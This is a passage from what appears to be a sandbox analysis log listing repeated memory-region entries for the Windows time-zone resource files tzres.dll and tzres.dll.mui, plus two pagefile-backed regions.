filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2715
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2716
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2717
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2718
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2719
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2720
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2721
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2722
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2723
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2724
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2725
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2726
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2727
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2728
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2729
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2730
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2731
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2732
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2733
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2734
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2735
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2736
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2737
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2738
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2739
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2740
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2741
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2742
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2743
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2744
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2745
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2746
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2747
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2748
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2749
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2750
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2751
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2752
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2753
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2754
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2755
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2756
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2757
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2758
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2759
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2760
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2761
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2762
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2763
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2764
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2765
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2766
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2767
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2768
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2769
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2770
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2771
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2772
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2773
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2774
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2775
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2776
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2777
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2778
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2779
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2780
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2781
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2782
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2783
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2784
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2785
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2786
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2787
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2788
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2789
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2790
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2791
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2792
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2793
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2794
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2795
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2796
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2797
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2798
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2799
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2800
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2801
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2802
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2803
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2804
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2805
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2806
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2807
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2808
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2809
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2810
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2811
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2812
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2813
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2814
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2815
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2816
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2817
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2818
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2819
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2820
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2822
start_va = 0xa60000
end_va = 0xa62fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a60000"
filename = ""
Region:
id = 2823
start_va = 0xa70000
end_va = 0xa77fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a70000"
filename = ""
Region:
id = 2824
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2825
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2826
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2827
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2828
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2829
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2830
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2831
start_va = 0xaa0000
end_va = 0xaa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2832
start_va = 0xa90000
end_va = 0xa90fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
